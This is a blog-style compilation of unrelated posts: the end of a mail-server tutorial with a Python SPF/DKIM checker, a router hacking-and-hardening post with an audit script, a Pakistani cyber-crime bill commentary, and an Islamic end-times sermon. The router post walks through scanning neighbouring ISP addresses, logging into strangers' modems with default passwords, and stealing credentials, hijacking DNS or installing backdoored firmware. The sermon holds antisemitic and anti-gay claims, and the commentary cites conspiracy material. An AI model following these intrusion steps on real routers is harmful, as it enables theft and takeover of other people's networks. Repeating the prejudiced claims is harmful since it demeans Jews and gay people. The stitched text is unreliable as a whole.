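def dkim_key_bits(record):
    """RSA key size from a DKIM TXT record; whitespace inside p= (DNS line splits) is removed."""
    p = re.sub(r"\s+", "", parse_dkim_tags(record).get("p", ""))
    return rsa_modulus_bits(base64.b64decode(p, validate=True))


def check_dkim(record):
    """Return a list of findings for a DKIM TXT record (empty list means it looks fine)."""
    tags = parse_dkim_tags(record)
    findings = []
    if tags.get("v", "DKIM1") != "DKIM1":  # v is optional, but must be DKIM1 when present
        findings.append("v tag must be DKIM1")
    key_type = tags.get("k", "rsa")
    if key_type != "rsa":
        return findings + [f"unsupported key type '{key_type}' (this check only handles rsa)"]
    if not tags.get("p"):
        return findings + ["empty p= tag (revoked key)"]
    try:
        bits = dkim_key_bits(record)
    except (ValueError, IndexError):
        return findings + ["p= is not a valid base64 SubjectPublicKeyInfo"]
    if bits < 2048:
        findings.append(f"{bits}-bit RSA key; 2048 bits is the current recommendation "
                        "(opendkim-genkey -b 2048)")
    return findings


if __name__ == "__main__":
    for name, record, check in (("SPF", SPF_RECORD, check_spf), ("DKIM", DKIM_RECORD, check_dkim)):
        print(name, "findings:", check(record) or "none")
```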

    Testing
    Once all the above steps are complete, it is time to test your newborn mail server.

  • DNS Records
    Verify that all your DNS records are set up properly by typing this command:
    nslookup -type=ANY mydomain.com
    The result should look like this:
    (image: nslookup type ANY output)
    The MX, SPF and DKIM records must all be present in the results.

  • Compliance
    To make sure your mail server meets the standards and follows best practices, send an empty email to [email protected] from SquirrelMail.
    Open http://www.allaboutspam.com/email-server-test-report/index.php in your browser, enter the address you sent the empty email from ([email protected]) and press Enter.
    All results should be shown in green except the BATV and Greylist checks. For the SPF test, for instance, you should see this:
    (image: SPF compliance test result)
    Within 10 to 15 minutes, a mail will arrive in your SquirrelMail inbox containing a link confirming that your mail server follows best practices.

  • Gmail, Hotmail and Yahoo!
    Try sending email from SquirrelMail to the most widely used email services to test delivery.
    Do not use words like "test email" or "mail testing" in the subject or body; doing so increases the chance of your email landing in the spam folder.
    Write something creative that doesn't look like spam and your email will land safely in Gmail's and Yahoo!'s inbox.
    Hotmail is a different story: Hotmail's SmartFilter uses IP reputation in addition to other methods to identify potential spam, and it takes time before SmartFilter whitelists your IP. Until then your contacts will have to check their Junk folder to find your email.
    Other than that, it works fine with most email service providers worldwide.

  • Debugging
    If something doesn't work after following the steps above, check the following logs to find the culprit:
    For mail server related problems: tail -f /var/log/maillog
    For DNS server related problems: tail -f /var/named/log/queries.log
    For user authentication related problems: tail -f /var/log/secure
    For other problems: tail -f /var/log/messages

    If you have problems following this tutorial, just write in the comments and we will sort it out!

    Hacking and Securing DSL Routers

    Introduction:
    (Note: if you know how DSL works, you can jump to the next section!)
    Most internet users nowadays use DSL connections. DSL stands for Digital Subscriber Line and provides internet over telephone lines, using ADSL routers or ADSL modems. Here is a layman's diagram of how DSL works:
    (image: how DSL works)

    Whenever a user turns on their DSL modem, it connects to the DSLAM, which is usually located in the ISP exchange. Each DSLAM can serve thousands of DSL users. In the image above it looks like a small box, but in reality it is much bigger:
    (image: back side of a DSLAM)

    The DSLAM is responsible for checking the condition of the telephone line and ensuring that a stable connection can be maintained. It also holds some properties for each telephone line; the download and upload rates you see on your modem's status page are set by the DSLAM. Once the DSLAM connection is established, the DSL light on some modems turns on.
    (image: modem with ADSL light off)

    Now the modem sends an internet access request to the BRAS server. This request contains the DSL username and password saved in the modem settings; the login is usually set by the lineman when installing a new DSL connection. The BRAS server is directly connected to the central RADIUS server, which holds the login information of all DSL users. The RADIUS server also keeps a list of IP addresses not currently in use. If the login sent by the modem is valid, the RADIUS server responds with one IP address from that list. Once the modem receives the IP address, the internet connection is established and the internet light on the modem turns on:
    (image: modem with internet light on)

    That was a lengthy introduction to DSL and how it works, for non-technical readers!

    How to Hack:
    After reading the above introduction we know that each DSL connection is assigned a unique public IP address from a list. This list is basically a range of IP addresses assigned to the ISP by the RIR. We can check our IP address here: http://myip.counterstrike.com.pk/. I assume my IP address is 66.150.150.10. The IP address we see is the IP address assigned to our modem. What will happen if we change the last part of our IP address and enter 66.150.150.11 in the web browser?
    ip_connect_error

    Oh. It looks like that IP address does not belong to any DSL user. Let's try 66.150.150.11:
    router_basic_auth_page
    (Keep increasing the last number of IP Address until you hit a login page. Don’t give up too soon!)

    Looks like we have reached the login page of another DSL user's modem. The default login for most modems is admin:admin; more default logins are given in the next section. Once we log in successfully, we have full control over that modem.
    For example:

    • We can steal their DSL login and use their bandwidth:
      modem_wan_ppp_settings

    • Change their DNS Servers and hijack their DNS Requests:

    • Steal their Wi-Fi keys:
      modem_wifi_key_wpa_psk

    • Enable DMZ to remotely access internal LAN computers:
      modem_dmz_pic

    • Replace ACS with our own for remote configuration of modem:
      modem_acs_server_attacker

    • Replace modem’s firmware with our own backdoored firmware:
      modem_firmware_backdoor_update

    As you can see, we can do pretty much anything we want with that DSL Router we just owned.

    How to Secure:
    Now that we have learned about the various tricks used to exploit the router, let's go through the different ways to secure it:

    • Change Default Router Configuration Password:
      If you have installed a new DSL connection, chances are that your login and password combination is one of the following defaults:
      admin:admin
      support:support
      user:user
      admin:ISP NAME
      admin:LAST 5 HEX CHARACTERS OF MODEM MAC ADDRESS+1
      Always use a strong password that does not include dictionary words.
      Some modems have multiple login accounts so make sure you have changed passwords for all of them:
      modem_default_login_pass

    • Change Default DSL Connection Password:
      Call your ISP helpline and ask them to change your DSL or Broadband or PPP account password.
      If you do not change it, someone else might use it and you will be billed for their download usage.

    • Disable Remote Access to Modem:
      This is to make sure no one can connect to your router from outside your network.
      modem_acl_services_lan_wan_ftp_tftp_snmp_http_icmp_telnet_ssh

    • Disable TR-069 Client:
      If you know how to configure your router, you don’t need your ISP to remotely access your router.
      So you can simply disable it.
      modem_acs_tr069_disable

    • Use a Strong Wi-Fi Password:
      Always use a strong WPA/PSK key as the Wi-Fi password. If the attacker is on your LAN, which means they already have your Wi-Fi password, they can easily sniff your router credentials with a MITM attack on your local network.

    • Be Smart:
      If you connect to your Wi-Fi network and the browser opens a page asking for your Wi-Fi password, beware! Someone is trying to steal your Wi-Fi password using Wi-Fi phishing. This is a new technique and it cannot be prevented directly. All you can do is educate your friends and family about how this works so they are cautious about these attacks.

    If you follow the above steps, no one can break into your router remotely or locally.
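    A configuration audit that encodes the checklist above (default logins, management reachable from the WAN, TR-069 and the ACS address, DNS servers, DMZ, Wi-Fi passphrase) and also flags the signs of the compromises listed in the previous section. This is an added example, not code from the original post; the settings dictionary layout, its field names and all sample values are assumptions.

```python
import re

# Default admin logins from the checklist above (constructed lookup set).
DEFAULT_LOGINS = {("admin", "admin"), ("support", "support"), ("user", "user")}

# Management services that must not be reachable from the WAN side.
WAN_SENSITIVE = {"ftp", "tftp", "snmp", "http", "telnet", "ssh"}

# Constructed sample: a router still on its shipped settings (all field
# names are assumptions; real routers expose them in the web UI or a backup).
SAMPLE_WEAK = {
    "admin_accounts": {"admin": "admin", "support": "support"},
    "wan_services": ["http", "telnet", "icmp"],
    "tr069_enabled": True,
    "acs_url": "http://acs.attacker.example/cwmp",
    "dns_servers": ["203.0.113.53"],
    "dmz_host": "192.168.1.100",
    "wifi_security": "WPA2-PSK",
    "wifi_psk": "password",
}

def password_is_weak(user, pw, isp_name, dictionary):
    """True if the admin password is a listed default, short, or a dictionary word."""
    if (user, pw) in DEFAULT_LOGINS:
        return True
    if user == "admin" and pw.lower() == isp_name.lower():   # admin:<ISP NAME>
        return True
    return len(pw) < 10 or pw.lower() in dictionary

def psk_is_weak(psk, dictionary):
    """WPA-PSK passphrase: require length and at least three character classes."""
    if len(psk) < 12 or psk.lower() in dictionary:
        return True
    classes = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]")
    return sum(1 for p in classes if re.search(p, psk)) < 3

def audit_router(cfg, isp_name, expected_dns, expected_acs_host, dictionary=frozenset()):
    """Return (severity, message) findings for the hardening checklist above."""
    findings = []
    for user, pw in cfg["admin_accounts"].items():
        if password_is_weak(user, pw, isp_name, dictionary):
            findings.append(("HIGH", f"account '{user}' uses a default or weak password"))
    exposed = WAN_SENSITIVE & set(cfg["wan_services"])
    if exposed:
        findings.append(("HIGH", "management reachable from WAN: " + ", ".join(sorted(exposed))))
    if cfg["tr069_enabled"]:
        findings.append(("MEDIUM", "TR-069 client enabled"))
        acs_host = cfg["acs_url"].split("//", 1)[-1].split("/", 1)[0]
        if acs_host != expected_acs_host:   # ACS replaced by someone else's
            findings.append(("HIGH", f"ACS points to unexpected host {acs_host}"))
    if set(cfg["dns_servers"]) - set(expected_dns):   # DNS hijack indicator
        findings.append(("HIGH", "DNS servers differ from the ISP's"))
    if cfg["dmz_host"]:
        findings.append(("MEDIUM", f"DMZ exposes internal host {cfg['dmz_host']}"))
    if cfg["wifi_security"] in ("OPEN", "WEP") or psk_is_weak(cfg["wifi_psk"], dictionary):
        findings.append(("HIGH", "weak Wi-Fi security mode or passphrase"))
    return findings

if __name__ == "__main__":
    for sev, msg in audit_router(SAMPLE_WEAK, "ExampleISP", ["198.51.100.1"],
                                 "acs.exampleisp.example", {"password"}):
        print(sev, msg)
```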

    Conclusion:
    The sole purpose of writing this post was to spread awareness about security and to educate the internet users and the ISP operators about the different threats they are exposed to.
    So if you suspect that your router might be vulnerable, now is the right time to secure it.

    Better safe than sorry!

    Cyber Crime Bill in Pakistan: The Bright Side

    Cyber Crime Laws in Pakistan
    If you belong to Pakistan you might have seen the recent fuss about the “Controversial Cyber Crime Bill” that will snatch the basic rights of internet users.
    This bill will take away everything including your internet privacy, freedom of speech and liberty. Once passed, it will be a cyber apocalypse for Pakistan.
    At least this is what the media is projecting about that bill.

    bolobhi-pasha-cybercrime-bill-update
    Below are a few texts quoted from various social and mainstream media sources:

    • If you send someone a message or email without their permission, you are a criminal.
    • Posting someone's image online without their consent will land you in jail.
    • It will be a crime to write anything online against government or politicians.
    • Police or any other agency will be allowed to pick anyone without arrest warrants.
    • Government will block any website they want for any reason.
    • Internet in hotels and cafes will be banned.

    A few facts to keep in mind before I go any further:

    • Criminals are now using the internet as a weapon for blackmailing the vulnerable. Victims often commit suicide in serious cases. If these criminals are ever caught, they are released most of the time because there are no laws that properly define those crimes.
    • Criminals mostly use open WiFi networks and cybercafés.
    • Pakistan government has already deployed a nationwide web filter which blocks adult websites, blasphemous material and anything that seems inappropriate to them. Government has used this system to block many legitimate websites without revealing any reasons. So this is nothing new that is going to happen.
    • Government agencies have powers to arrest anyone without requiring any arrest warrants, but only when it is necessary: when they have solid intelligence about illegal activities and when national security is at stake.

    mind_control
    Well, this media is a paid mind control machine. They are a modern form of black magic. You pay them well and they will turn everything in your favor. From spoiling someone's reputation using scandals to violent strikes, this media plays the role of a positive catalyst. I am talking about mainstream media, the TV channels and the newspapers. Social media is not that mature yet. In our case it looks like some people don't want to see these Cyber Crime Laws implemented.
    Power of media

    More details about mind manipulation by media and the methods used can be found on these links:

    “10 Strategies of Manipulation” by the Media

    Silent Weapons for Quiet Wars

    The whole point of this post is that we should not blindly believe in what we are shown by the media. We must do our own research before supporting or opposing anything.

    ISLAM – WHAT IT SAYS ABOUT THE END OF THE WORLD

    786

    Brothers & Sisters;

    Since I have not seen any posts that deal with the issue of the end of the world from the point of view of what ISLAM says, I have decided to bring you this summary:

    Note the following when reading this:
    1- The sequence of events noted comes from the Qur'an and the Hadith (the sayings of Prophet Muhammad (SAW)).
    2- Under Islam Jesus is considered a Prophet and not God.
    3- Islam includes both Judaism and Christianity. All of the Prophets from Adam, Noah, Abraham, John, Christ, and Muhammad (pbuh) are considered Prophets of Islam.
    4- I am writing this with knowledge of both religions as I was Christian Catholic and have embraced Islam a few years ago.
    5- The information that appears in the Bible and the Islamic texts corroborate each other. Anyone can buy all these books and read for themselves. There are a significant number of good quality books that address this issue from the point of view of Christianity and Islam. It is just a matter of taking what matches in both religious texts to assess predictions that span more than 2000 years.
    6- As you read this you will clearly see that these events are unfolding in front of our eyes, and GOD KNOWS BEST.

    THE SEQUENCE OF EVENTS:

    1- Increasing turmoil and natural disasters, war, death and conflict. See below the list of signs given by the Quran and Prophet Muhammad.

    2- Major catastrophe that will kill 2/3 of the world's population. The continents will move and due to the massive changes plants, animals and human life will die off in large numbers. There will not be much food. It is possible that this will happen in the year 2012 but nothing in the Islamic texts confirms this. The only possible sign is that there are no predictions made in Islam beyond the year 2000. Either a meteorite or some sort of energy pull will cause a shift in the earth's axis. This will cause the “sun to come out from the west” (see below predictions). Take a globe and flip it upside down – you will see that the sun will come out from the west. At this time also there will be constant daylight as the earth tilts and moves into the new axis position. As you know Muslims pray 5 times a day. Prophet Muhammad indicated to people that at this time they should break up the day in equal portions and maintain their scheduled prayers.

    3- The appearance of the ANTICHRIST. In Islamic terminology he is called the DAJJAL or LIAR or DECEIVER. This individual will be a Jew whose father will be a Rabbi, he will be blind in one eye and the remaining eye will stick out like a grape. He will have extraordinary powers that will make people believe he is god. He can only be killed by Jesus (a.s.). He will be born in or around the Arabian Peninsula. The fact that he will be Jewish is pointed out in the Torah (Old Testament in the Bible) – Prince of The Israelites – and the Islamic texts point out that his main followers will be Jews.
    Due to his miraculous powers he will be taken by most of the Jewish and Christian people as the Messiah. As you know Evangelical Christians are waiting for the Messiah once Israel is established. Anyone will be able to identify him because he will only support evil actions. A significant number of Muslims will leave their Faith to also join him and believe in him. It is predicted that a Muslim will believe in the morning and disbelieve in the evening and a non-believer will not believe in the morning and believe in the evening. The only people who will oppose him will be a small number of believing Muslims. The Muslims will be persecuted by the ANTICHRIST who will present them as an evil force (sounds familiar?). He will claim he is himself god. The reason for people following him is that due to the amount of turmoil, war, and killings many people will stop believing in God and be angry at Him (as opposed to blaming ourselves for our own corrupt ways). They will look at this individual as their saviour who will have power to produce some food or water for them. Anyone who follows or worships the ANTICHRIST will be cursed to Hell by God.

    4- In the Arabian Peninsula an individual will appear. In the Islamic predictions his name is MEHDI (IMAM MEHDI r.a.). He will gather the Muslims who oppose the ANTICHRIST and fight him. For MEHDI and the opposing forces it will be an ongoing losing battle. Muslims will be defeated in the East and then the West. The ANTICHRIST will come to the walls of Mecca and Medina but he will not be able to enter them.

    5- Jesus (a.s.) will descend in Jerusalem. In the Islamic belief Jesus was not crucified, but God replaced him on the cross with another individual and took Jesus (a.s.) up to Heaven. One of the main predictions in relation to Jesus (a.s.) is that his descent will be witnessed by EVERYBODY. He will declare his condition as a Prophet and not God. People will turn away from the ANTICHRIST. Jesus (a.s.) will kill the ANTICHRIST at one of the gates of Jerusalem.

    6- Once this happens the people of Gog and Magog will come out. They will be all killed. Peace and prosperity will then descend upon the whole world where Jesus (a.s.) will be the leader of all people. At this point Jesus (a.s.) will marry and have a family.

    7- Jesus (a.s.) will die. Then, all good people will be taken up by God through a wind that will descend and kill them. Only corrupt, unbelieving people will remain. The end of the world will then come and Judgment Day.


    These are SIGNS related to the end of times according to Islamic sources:

    Wild animals will be gathered into captivity and kept in collections in pens and cages.

    Murder will be considered a minor act.

    Men will get payment for their reproductive organs (artificial fertilization).

    Reducing weights and measures of goods will be a means of increasing profits.

    The person earning a proper and lawful livelihood will be scorned and the person earning his living from unfair means will be admired.

    The main purpose in life will be earning and enjoying.

    Aphrodisiacs will be used to strengthen the body for sodomy.

    Usury will gain solid ground.

    Adultery will be commonplace.

    The murder victim will not know why he is murdered and the killer will not know why he killed.

    Mansions like palaces will be constructed.

    Bribery will become like a custom.

    There will be no regard for the ties of relationship.

    Murder will increase.

    Fools will be made rulers.

    Forbearance will be called cowardice and weakness.

    Ministers of government will be liars.

    The practice of divorce will increase.

    A liar will be considered an acceptable witness.

    Homosexuality will be openly practiced.

    Good people will keep silent fearing others’ foul speech.

    Goodness and evil will be viewed from the same perspective.

    Young boys will be used like women on payment.

    Unworthy persons will meddle in affairs of state.

    Men will keep their hair in a ladylike manner.

    The governors will consider the wealth of the people as their own and they will attack the morality of women.

    Governments will stockpile grains to maintain prices.

    Government will be entrusted to those unworthy of it.

    The earth will vomit oblong pieces of its liver like columns of gold and silver. The murderer will come and say “I killed for this,” and the deserter will come and say “I deserted my family for this,” and the thief will come and say “My hand has been cut off for this.”

    The Euphrates will disclose a mountain of gold over which people will fight. Ninety-nine out of each hundred will be killed and every one of them will say “Maybe I will be the one who will escape.”

    The Last Hour shall not occur until wealth will increase among you and become enormous, until a man takes out the charity due from his wealth but will find none to accept it, until the land of the Arabs becomes meadows and rivers.

    The Last Hour shall not occur until wealth will increase among you and become enormous, and the owner of wealth will search for one entitled to the charity due on it; and he will present it and the person to whom it will be presented will say “I have no need of it;” and barefooted shepherds will compete with each other in the building of tall buildings.

    The slave girl will give birth to her owner.

    ABOUT THE MUSLIMS IT HAS BEEN PREDICTED:

    You will follow the practices of those who were before you, step by step, foot by foot, so much so that if one of them goes into the hole of a lizard you will follow.

    God will take up the knowledge, not by removing it from the minds of people, but by taking possession of the knowledgeable. Then the people will call on the ignorant to inform them, and they will go astray and lead astray.

    The people will get up in the morning to carry on trade and there will be hardly anyone who will fulfill their bargain. It will be said “There is a trustworthy man in so and so;” and it will be said of a man “How wise is he! How skillful is he! How resolute is he,” while in his heart there will be no faith even to the grain of a mustard seed.

    It is near that the nations will call one another against you just as diners call one another to their dishes. You will be numerous, but you will be so much rubbish like the rubbish of a flood. God will take away the fear of you from the minds of your enemies and will put weakness in your hearts, from love for this world and dislike of death.

    Wait for the last Hour when allegiance will be destroyed. Wait for the Hour when rule will be entrusted to those who will be unworthy of it.

    The Hour shall not occur until time contracts. A year will go by like a month, a month like a week, a week like a day, a day like an hour and an hour like the kindling of a fire.

    Time will become short, learning will come to an end, troubles will appear, miserliness will be cast in the hearts, and murder will increase.

    The first of the signs to appear will be the rising of the sun in its place of setting and the coming forth of the beast in the morning. Whichever of them comes first will soon be followed by the other.

    Let him who hears of the dajjal go far from him, for I swear by God that a man will go to him thinking he is a believer and follow him because of confused ideas which he rouses in him.

    The Smoke; the Dajjal; the Beast; the rising of the sun in its place of setting; the descent of Jesus son of Mary; Gog and Magog; three earthquakes — one in the East, one in the West, and one in Arabia; and a fire which will drive mankind to their place of assembly.

    The least of the signs of the last hour will be a fire which will gather mankind from the east to the west.

    ABOUT THE ANTICHRIST (DAJJAL IN ISLAMIC TERMINOLOGY):

    There is no prophet who has not warned his people about the one-eyed liar. I tell you that he is one-eyed, but your Lord is not one-eyed. On his forehead are the letters “k,” “f,” “r.” (KUFAR means UNBELIEVER IN GOD)

    He is one-eyed, and will bring with him something like paradise and hell, but what he calls paradise will be hell. I warn you as Noah warned his people about him.


    ———————————————————————–

    Brothers & Sisters;

    Regardless of the end of times, our own “individual end of times” comes when we die. We must move forward to change.
    We have to get ready to account for our actions in this world in front of GOD.
    We MUST work together regardless of religion to bring justice and peace to this world.

    Peace.

    T.Z